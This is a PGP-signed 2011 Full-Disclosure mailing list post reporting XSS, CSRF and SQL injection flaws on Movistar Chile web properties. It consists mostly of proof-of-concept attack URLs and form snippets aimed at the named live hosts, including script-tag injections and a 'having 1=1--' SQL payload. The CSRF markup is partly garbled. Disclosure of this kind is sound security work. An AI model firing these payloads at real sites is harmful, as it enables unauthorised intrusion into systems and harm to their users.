[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] Multiple XSS+XSRF found at Movistar Chile



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


Status: reported
Discovered: April 25, 2011, 9:32 p.m.

XSS:
http://www.movistar.cl/PortalMovistarWeb/appmanager/Porta%3Cscript%3Ealert(/xss/)%3C/script%3EalMovistar/portal?_nfpb=true&_pageLabel
<http://www.movistar.cl/PortalMovistarWeb/appmanager/Porta%3Cscript%3Ealert%28/xss/%29%3C/script%3EalMovistar/portal?_nfpb=true&_pageLabel>
reported on: http://secureless.org/v/1357/

XSS:
http://www.movistar.cl/PortalMovistarWeb/appmanager/PortalMovistar/portal?_nfpb=true&_pageLabel=P12200150661236808023656&q=%22;%3C/script%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
<http://www.movistar.cl/PortalMovistarWeb/appmanager/PortalMovistar/portal?_nfpb=true&_pageLabel=P12200150661236808023656&q=%22;%3C/script%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E>
Reported on: http://secureless.org/v/1360/

XSRF (CSRF):
<form
action=?http://www.movistar.cl/PortalMovistarWeb/appmanager/PortalMovistar/portal?_nfpb=true&_pageLabel=P12200150661236808023656?
id=?cse-search-box? method=?post? style=?margin-top: 7px;
margin-right: 2px?>
<div><input id=?idsearch? type=?text? name=?q? size=?31?/>
<a
href=?http://www.movistar.cl/PortalMovistarWeb/appmanager/PortalMovistar/portal?_nfpb=true&_pageLabel=P12200150661236808023656&q=aaaaaaa%22;%20asasasasa#?
id=?btn_buscadorMovistar? target=?_parent?>a</a></div>
</form>
Reported on: http://secureless.org/v/1361/

XSRF (CSRF):
https://www.mcloud.cl/cp/ps/Main/login/Authenticate

<input onclick="restoreUser(this)" name="usuario"
value="usuario@xxxxxxxxxxx" maxlength="255" type="text"></p>
<input id="password" onclick="this.value=''" name="password"
value="Clave" maxlength="255" onkeypress="validarEnter(event);"
onfocus="cambiaFoco('s')" onblur="cambiaFoco('n')" type="password"></p>
<p class="button"><a href="javascript:login()"><span style="font-size:
12px; color: rgb(255, 255, 255); font-family: Arial;">Entrar</span></a>
Reported on: http://secureless.org/v/1358/

SQL Injection:
http://www.188.cl/?area=%27having%201=1?
<http://www.188.cl/?area=%27having%201=1-->

Reported on: http://secureless.org/v/1359/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iQEcBAEBAgAGBQJNt4i+AAoJEP64MfdRn+k8QG4H/1rQlYYGKdohOi/Gtg0QgK39
U/05s0p6k8yL8Qu0qeZ+b+WFR+hiZULQ4Jm18Jg9IH+brVmVOK5ec+ZnANajxxw/
M3OMs3TsAOg8AsIbdJHJKo3BSr+8aN/7ur4tOJJV9EnzBijsH1d6ieGMsJq5sPNz
4K+UPdBLEKc31HpaF+PHsBNEZ45bVmTUbctHnYPhF57lUTh0Zi/S8NIcjxjc4V+8
URw6aEmE6aNclaWREcseWzgDvDOMisHSav0c7Y9DI9W4yk8QDqx7+FJk+w500UAK
uBJ4oXvX5FyQZkrRwSsIcSC3Ptl/Ipvno09IEC+O6t5hTMPF+B1SsH0fXcKPBFM=
=8B6S
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/